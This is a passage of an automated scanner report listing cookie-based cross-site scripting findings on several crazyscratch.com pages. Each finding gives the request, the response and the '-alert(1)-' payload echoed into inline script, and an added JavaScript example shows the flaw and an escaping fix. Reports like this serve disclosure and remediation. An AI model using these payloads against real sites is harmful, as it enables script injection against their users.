<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FM5421a"-alert(1)-"1e275a84da5";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.242. http://www.info.crazyscratch.com/ContactUsTel.aspx [RegistrationMode cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.info.crazyscratch.com
Path:   /ContactUsTel.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9a73f"-alert(1)-"d2ffb2ab02e was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ContactUsTel.aspx HTTP/1.1
Host: www.info.crazyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: crazyscratchl=ENG; crazyscratchccode=US; crazyscratchp=; crazyscratchlang=English; crazyscratchu=http%3A//www.crazyscratch.com/; CSI_28=EncryptedUniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398&AffiliateID=28&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; LanguageCode=ENG; RegistrationMode=PM9a73f"-alert(1)-"d2ffb2ab02e; BO=FM; CountryCode=US; CSITemp=28; crazyscratcha=; ASP.NET_SessionId=hg30s4bf4mnutp55xmx3ia45; crazyscratchc=GBP;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:51:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM9a73f"-alert(1)-"d2ffb2ab02e; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:51:00 GMT; path=/
Set-Cookie: BO=FM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:51:00 GMT; path=/
Set-Cookie: UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:51:00 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:51:00 GMT; path=/
Set-Cookie: CountryCode=US; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:51:00 GMT; path=/
Set-Cookie: CSITemp=28; domain=info.crazyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 54496


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM9a73f"-alert(1)-"d2ffb2ab02e";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.243. http://www.info.crazyscratch.com/FairPlay.aspx [BO cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.info.crazyscratch.com
Path:   /FairPlay.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dafa7"-alert(1)-"6b80f265c94 was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /FairPlay.aspx HTTP/1.1
Host: www.info.crazyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: crazyscratchl=ENG; crazyscratchccode=US; crazyscratchp=; crazyscratchlang=English; crazyscratchu=http%3A//www.crazyscratch.com/; CSI_28=EncryptedUniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398&AffiliateID=28&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; LanguageCode=ENG; RegistrationMode=PM; BO=FMdafa7"-alert(1)-"6b80f265c94; CountryCode=US; CSITemp=28; crazyscratcha=; ASP.NET_SessionId=hg30s4bf4mnutp55xmx3ia45; crazyscratchc=GBP;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:52:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:52:02 GMT; path=/
Set-Cookie: BO=FMdafa7"-alert(1)-"6b80f265c94; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:52:02 GMT; path=/
Set-Cookie: UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:52:02 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:52:02 GMT; path=/
Set-Cookie: CountryCode=US; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:52:02 GMT; path=/
Set-Cookie: CSITemp=28; domain=info.crazyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 56312


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FMdafa7"-alert(1)-"6b80f265c94";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.244. http://www.info.crazyscratch.com/FairPlay.aspx [RegistrationMode cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.info.crazyscratch.com
Path:   /FairPlay.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bf00e"-alert(1)-"f876188d7e6 was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /FairPlay.aspx HTTP/1.1
Host: www.info.crazyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: crazyscratchl=ENG; crazyscratchccode=US; crazyscratchp=; crazyscratchlang=English; crazyscratchu=http%3A//www.crazyscratch.com/; CSI_28=EncryptedUniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398&AffiliateID=28&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; LanguageCode=ENG; RegistrationMode=PMbf00e"-alert(1)-"f876188d7e6; BO=FM; CountryCode=US; CSITemp=28; crazyscratcha=; ASP.NET_SessionId=hg30s4bf4mnutp55xmx3ia45; crazyscratchc=GBP;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:51:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PMbf00e"-alert(1)-"f876188d7e6; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:51:26 GMT; path=/
Set-Cookie: BO=FM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:51:26 GMT; path=/
Set-Cookie: UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:51:26 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:51:26 GMT; path=/
Set-Cookie: CountryCode=US; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:51:26 GMT; path=/
Set-Cookie: CSITemp=28; domain=info.crazyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 56312


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PMbf00e"-alert(1)-"f876188d7e6";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.245. http://www.info.crazyscratch.com/Help.aspx [BO cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.info.crazyscratch.com
Path:   /Help.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 89770"-alert(1)-"fc1c50ab615 was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Help.aspx HTTP/1.1
Host: www.info.crazyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: crazyscratchl=ENG; crazyscratchccode=US; crazyscratchp=; crazyscratchlang=English; crazyscratchu=http%3A//www.crazyscratch.com/; CSI_28=EncryptedUniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398&AffiliateID=28&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; LanguageCode=ENG; RegistrationMode=PM; BO=FM89770"-alert(1)-"fc1c50ab615; CountryCode=US; CSITemp=28; crazyscratcha=; ASP.NET_SessionId=hg30s4bf4mnutp55xmx3ia45; crazyscratchc=GBP;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:51:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:51:02 GMT; path=/
Set-Cookie: BO=FM89770"-alert(1)-"fc1c50ab615; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:51:02 GMT; path=/
Set-Cookie: UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:51:02 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:51:02 GMT; path=/
Set-Cookie: CountryCode=US; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:51:02 GMT; path=/
Set-Cookie: CSITemp=28; domain=info.crazyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 55561


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FM89770"-alert(1)-"fc1c50ab615";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.246. http://www.info.crazyscratch.com/Help.aspx [RegistrationMode cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.info.crazyscratch.com
Path:   /Help.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1019c"-alert(1)-"e2075c7bc3b was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Help.aspx HTTP/1.1
Host: www.info.crazyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: crazyscratchl=ENG; crazyscratchccode=US; crazyscratchp=; crazyscratchlang=English; crazyscratchu=http%3A//www.crazyscratch.com/; CSI_28=EncryptedUniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398&AffiliateID=28&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; LanguageCode=ENG; RegistrationMode=PM1019c"-alert(1)-"e2075c7bc3b; BO=FM; CountryCode=US; CSITemp=28; crazyscratcha=; ASP.NET_SessionId=hg30s4bf4mnutp55xmx3ia45; crazyscratchc=GBP;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:50:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM1019c"-alert(1)-"e2075c7bc3b; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:50:26 GMT; path=/
Set-Cookie: BO=FM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:50:26 GMT; path=/
Set-Cookie: UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:50:26 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:50:26 GMT; path=/
Set-Cookie: CountryCode=US; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:50:26 GMT; path=/
Set-Cookie: CSITemp=28; domain=info.crazyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 55561


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM1019c"-alert(1)-"e2075c7bc3b";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.247. http://www.info.crazyscratch.com/InviteFriend.aspx [BO cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.info.crazyscratch.com
Path:   /InviteFriend.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f9722"-alert(1)-"452cc3e34b was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /InviteFriend.aspx HTTP/1.1
Host: www.info.crazyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: crazyscratchl=ENG; crazyscratchccode=US; crazyscratchp=; crazyscratchlang=English; crazyscratchu=http%3A//www.crazyscratch.com/; CSI_28=EncryptedUniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398&AffiliateID=28&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; LanguageCode=ENG; RegistrationMode=PM; BO=FMf9722"-alert(1)-"452cc3e34b; CountryCode=US; CSITemp=28; crazyscratcha=; ASP.NET_SessionId=hg30s4bf4mnutp55xmx3ia45; crazyscratchc=GBP;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:50:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:50:44 GMT; path=/
Set-Cookie: BO=FMf9722"-alert(1)-"452cc3e34b; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:50:44 GMT; path=/
Set-Cookie: UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:50:44 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:50:44 GMT; path=/
Set-Cookie: CountryCode=US; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:50:44 GMT; path=/
Set-Cookie: CSITemp=28; domain=info.crazyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 66940


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FMf9722"-alert(1)-"452cc3e34b";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.248. http://www.info.crazyscratch.com/InviteFriend.aspx [RegistrationMode cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.info.crazyscratch.com
Path:   /InviteFriend.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5a78c"-alert(1)-"a91a1aaad86 was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /InviteFriend.aspx HTTP/1.1
Host: www.info.crazyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: crazyscratchl=ENG; crazyscratchccode=US; crazyscratchp=; crazyscratchlang=English; crazyscratchu=http%3A//www.crazyscratch.com/; CSI_28=EncryptedUniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398&AffiliateID=28&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; LanguageCode=ENG; RegistrationMode=PM5a78c"-alert(1)-"a91a1aaad86; BO=FM; CountryCode=US; CSITemp=28; crazyscratcha=; ASP.NET_SessionId=hg30s4bf4mnutp55xmx3ia45; crazyscratchc=GBP;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:50:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM5a78c"-alert(1)-"a91a1aaad86; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:50:03 GMT; path=/
Set-Cookie: BO=FM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:50:03 GMT; path=/
Set-Cookie: UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:50:03 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:50:03 GMT; path=/
Set-Cookie: CountryCode=US; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:50:03 GMT; path=/
Set-Cookie: CSITemp=28; domain=info.crazyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 66941


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM5a78c"-alert(1)-"a91a1aaad86";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...
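The mechanism behind this and the following entries, as an added example that is not part of the XSS.CX report and not the crazyscratch.com site's own code. It rebuilds the script-string context visible in the responses (var strRegistrationMode = "..." / var strBonusOption = "..."), runs the canary from the issue above through both the vulnerable template and a hardened one, and shows the attribute-based alternative the remediation note prefers. All function names and the stub alert() are the editor's own; only the payload string and the two variable names come from the page.

```javascript
// Added example, not code from the XSS.CX report or from crazyscratch.com.
// It rebuilds the script-string context visible in the responses above,
//     var strRegistrationMode = "<cookie value>";
// to show why the canary "-alert(1)-" executes, and what the template
// should emit instead. All function names here are the editor's own.

// Canary copied from the RegistrationMode cookie in the issue above.
const PAYLOAD = 'PM5a78c"-alert(1)-"a91a1aaad86';

// Vulnerable template: the raw cookie value is concatenated into a
// double-quoted JavaScript string literal, as the server above does.
function buildInitScriptVulnerable(registrationMode, bonusOption) {
  return 'var strRegistrationMode = "' + registrationMode + '";\n' +
         'var strBonusOption = "' + bonusOption + '";\n';
}

// Encoder for the JavaScript string-literal context. Anything outside a
// small safe set is emitted as a \xHH or \uHHHH escape, so the engine
// decodes it back to the original character *inside* the literal and it
// can never terminate the literal, inject an operator, or close </script>.
function escapeForJsString(value) {
  return String(value).replace(/[^A-Za-z0-9 ,._-]/g, (ch) => {
    const code = ch.charCodeAt(0);
    return code < 0x100
      ? '\\x' + code.toString(16).padStart(2, '0')
      : '\\u' + code.toString(16).padStart(4, '0');
  });
}

// Hardened template: same output shape, every interpolated value encoded.
function buildInitScriptHardened(registrationMode, bonusOption) {
  return 'var strRegistrationMode = "' + escapeForJsString(registrationMode) + '";\n' +
         'var strBonusOption = "' + escapeForJsString(bonusOption) + '";\n';
}

// Preferred shape per the remediation note: keep user data out of script
// context entirely. Emit it as an attribute-encoded HTML attribute and let
// trusted script read it back through the DOM (element.dataset).
function escapeForHtmlAttribute(value) {
  return String(value).replace(/[&<>"']/g, (ch) => '&#' + ch.charCodeAt(0) + ';');
}
function buildConfigElement(registrationMode, bonusOption) {
  return '<div id="regcfg" data-registration-mode="' +
         escapeForHtmlAttribute(registrationMode) +
         '" data-bonus-option="' + escapeForHtmlAttribute(bonusOption) + '"></div>';
}

// Runs a generated snippet in an isolated function scope with a stub
// alert() that records its argument instead of showing a dialog. Returns
// the values the two page variables ended up holding and the alert() calls.
function runInitScript(source) {
  const alertCalls = [];
  const fn = new Function('alert',
    source + '\nreturn { strRegistrationMode: strRegistrationMode, strBonusOption: strBonusOption };');
  const vars = fn((arg) => { alertCalls.push(arg); return undefined; });
  return { vars: vars, alertCalls: alertCalls };
}

if (typeof require !== 'undefined' && require.main === module) {
  const vuln = runInitScript(buildInitScriptVulnerable(PAYLOAD, 'FM'));
  const safe = runInitScript(buildInitScriptHardened(PAYLOAD, 'FM'));
  console.log('vulnerable: alert() fired', vuln.alertCalls.length, 'time(s); value =', vuln.vars.strRegistrationMode);
  console.log('hardened:   alert() fired', safe.alertCalls.length, 'time(s); value =', safe.vars.strRegistrationMode);
  console.log(buildConfigElement(PAYLOAD, 'FM'));
}
```

With the vulnerable template the line parses as "PM5a78c" - alert(1) - "a91a1aaad86", so alert(1) is evaluated as an operand and the variable ends up NaN; with the hardened template the quotes and parentheses arrive as \x22 and \x28/\x29 inside the literal, alert() never runs, and strRegistrationMode holds the cookie value verbatim. The encoder is deliberately stricter than HTML-encoding because an HTML entity such as &quot; is not decoded inside an inline script and would not stop the quote from terminating the literal.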

3.249. http://www.info.crazyscratch.com/PlayersClub.aspx [BO cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.info.crazyscratch.com
Path:   /PlayersClub.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 24ff3"-alert(1)-"df7e568638e was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /PlayersClub.aspx HTTP/1.1
Host: www.info.crazyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: crazyscratchl=ENG; crazyscratchccode=US; crazyscratchp=; crazyscratchlang=English; crazyscratchu=http%3A//www.crazyscratch.com/; CSI_28=EncryptedUniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398&AffiliateID=28&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; LanguageCode=ENG; RegistrationMode=PM; BO=FM24ff3"-alert(1)-"df7e568638e; CountryCode=US; CSITemp=28; crazyscratcha=; ASP.NET_SessionId=hg30s4bf4mnutp55xmx3ia45; crazyscratchc=GBP;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:50:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:50:55 GMT; path=/
Set-Cookie: BO=FM24ff3"-alert(1)-"df7e568638e; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:50:55 GMT; path=/
Set-Cookie: UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:50:55 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:50:55 GMT; path=/
Set-Cookie: CountryCode=US; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:50:55 GMT; path=/
Set-Cookie: CSITemp=28; domain=info.crazyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 63410


